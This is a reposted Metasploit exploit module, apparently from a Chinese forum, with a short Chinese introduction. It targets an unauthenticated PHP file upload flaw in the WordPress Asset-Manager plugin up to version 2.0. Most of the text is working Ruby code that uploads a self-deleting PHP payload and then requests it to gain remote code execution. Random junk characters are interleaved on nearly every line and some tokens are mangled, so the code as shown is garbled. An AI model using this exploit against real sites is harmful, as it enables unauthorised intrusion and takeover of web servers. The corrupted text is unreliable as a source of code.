这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
3 d, F- D" k4 t6 `7 D) t: B A) t* \4 l' W; O' |# u0 G; Y
##
& ?, V1 h( i7 a5 I# This file is part of the Metasploit Framework and may be subject to$ _6 {" I( r4 r4 `4 H
# redistribution and commercial restrictions. Please see the Metasploit
" Z0 M) O* p( g/ X$ \- X! Z# Framework web site for more information on licensing and terms of use.
' X4 y8 ] U7 J5 e" M0 A/ h# http://metasploit.com/framework/
8 |2 z% m6 s& K' x##
5 l9 T* o5 s% o) Q! w
& q* N! S& E: W8 }" ~) M) M$ crequire 'msf/core'
$ e$ M) y( H- g6 Xrequire 'msf/core/exploit/php_exe'
* n/ @9 U% ]1 _3 k) V5 }' Y% D
9 j% p/ C9 w9 I/ C9 }class Metasploit3 < Msf::Exploit::Remote
% ?3 h7 j4 `$ _) ?/ n! x Rank = ExcellentRanking
! ]/ e6 g" n6 q e0 V1 u/ `/ }! ? M
' `7 j$ Y9 S T% Q+ I! w% {: l include Msf::Exploit::Remote::HttpClient4 v/ Y, h: s" z* w! [: S
include Msf::Exploit: hpEXE) `; A# }$ |% x' @
: k7 ?; m7 t$ J1 I1 F; q
def initialize(info = {})* j9 n1 H, ~. `* B, F% m
super(update_info(info,
- z- e0 U E6 W4 A3 e) | 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
7 r, s& p2 [0 @& U A& d% R 'Description' => %q{' r* v! g- u, V. ?, H! ~
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
2 ~/ B4 n" l5 y2 W7 r plugin. By abusing the upload.php file, a malicious user can upload a file to a
|5 j8 n8 l! q+ N5 o temp directory without authentication, which results in arbitrary code execution.- z* N, t# K! G
},
' d: T4 k5 z1 V! H 'Author' =>
( Q: l0 X( r9 g' [7 }7 V6 \ [
" G, r6 w8 O+ N4 F4 H4 q8 w 'Sammy FORGIT', # initial discovery
. x) O: Q3 q& _ 'James Fitts <fitts.james[at]gmail.com>' # metasploit module& S' q' q: l: k! h6 |* h
],5 I2 a9 O# h3 _! r
'License' => MSF_LICENSE,1 B" X; N+ o. F6 |1 o6 G+ P' r
'References' =>
3 H* F$ w9 ` p* E) o8 T [
, m$ J/ a: e) @/ R [ 'OSVDB', '82653' ],
3 w) B( E1 Y$ P9 G- v7 Q* T5 X [ 'BID', '53809' ],/ a4 w( D& K0 r2 ]3 M7 z5 V
[ 'EDB', '18993' ],
; z% v, ^! |+ e* a [ 'URL', 'http:// www.myhack58.com /' ]
. d# a( [. [0 y' x9 o ],
0 Z1 U- Y' V0 \& Y6 W) p 'Payload' =>8 c) t/ w( o9 U- Q$ M
{+ ~. x9 N" d+ W3 U/ j' o6 z m: O
'BadChars' => "\x00",$ J; h0 i6 ?' d4 V( L
},
- f6 S! Z; r/ x% \$ V$ S1 U2 S 'Platform' => 'php',& O4 c4 E& k$ R# \7 N7 d3 z3 J5 v
'Arch' => ARCH_PHP,$ E" `* n0 r$ Y: V% O8 ?. n% B
'Targets' =>
i& Q; \7 i* n [
3 ~5 t, `; Q, n" z0 I/ v* {7 K [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],/ U9 t/ {' a! \8 B {* p" Z7 I- L
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]- v9 w0 [' U$ N# d/ D
],
7 Q* Y; ?4 q: I/ V' P0 z7 [) K1 w1 T 'DefaultTarget' => 0,4 l6 z8 D8 Y* X
'DisclosureDate' => 'May 26 2012'))
/ I' K" e2 b! c ]& a+ j" W4 ] ! j0 ?) y: \/ ~# o4 G, c- L4 ~' M0 E
register_options(
+ p9 M, o! c! S2 H [
; t2 A. N& t! R I$ l x OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
; J9 x0 u, Y7 f! F& o: x! B) K, Q ], self.class)
# o/ V7 l `. u3 T: Q end
+ S/ l. |$ q( A; o3 @$ }
! G) T7 Q' \9 z def exploit* s/ p, P1 |% L8 t, [
uri = target_uri.path
* |6 i9 h, Y i U1 e8 y uri << '/' if uri[-1,1] != '/'( }4 c+ ~) a* p8 t7 X
peer = "#{rhost}:#{rport}"7 m/ m q( M/ N% Y- H. Q
payload_name = "#{rand_text_alpha(5)}.php"
& k" T" L2 ~+ R2 ~9 s1 _+ v php_payload = get_write_exec_payload(:unlink_self=>true)# _4 _: }: a; i7 X+ r
- s% x! o: ^$ H$ m: c& p data = Rex::MIME::Message.new
: W+ u% l. H, Q! \ data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")2 P O. _0 d6 m# H
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
5 H$ n9 {7 @0 ~# B4 U - y7 k Z) f4 @6 N: X& ~9 X+ j
print_status("#{peer} - Uploading payload #{payload_name}"): h! ]( ~% L2 Q8 A V8 ~
res = send_request_cgi({
) S' T2 x7 H( ?5 W& \ 'method' => 'POST',; x% m' Q& f) n. _
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",, W( z- k& T% q9 g* |6 d
'ctype' => "multipart/form-data; boundary=#{data.bound}",0 t* U) }9 y4 L7 V' N1 k4 M6 V2 w
'data' => post_data
5 f: V% X+ g' x })" Q9 a- a# z9 C2 G4 b! _
% s2 l8 A2 u8 w/ O! e7 Q( K
if not res or res.code != 200 or res.body !~ /#{payload_name}/
" y, I0 o7 g( n x fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
, q _/ w T4 ?end! [( v2 @) C7 E" S
) P. g8 s# E6 O( _' _! g
print_status("#{peer} - Executing payload #{payload_name}")1 {+ l) _5 X9 `( @& z. ^" c* l
res = send_request_raw({- N; d$ r' s3 F7 }3 B7 A& ?
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
* i$ \$ S, h- Z9 J$ T& m 'method' => 'GET'
3 a( Y& ]9 v+ O# I7 ~ })
4 A1 I, W( _$ K6 g* U 6 \% g" C% g. o9 y$ v9 w6 a q/ p
if res and res.code != 2004 D) K9 x/ n9 s8 k( y+ w. p* m+ ]; p
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
( X+ M' m! l9 D5 Q end1 @. p( X" [5 X% i; ?: l( }! g
end
o' E, J- {7 a0 Jend
) n6 Z$ S& b: ^2 m: B0 _! W |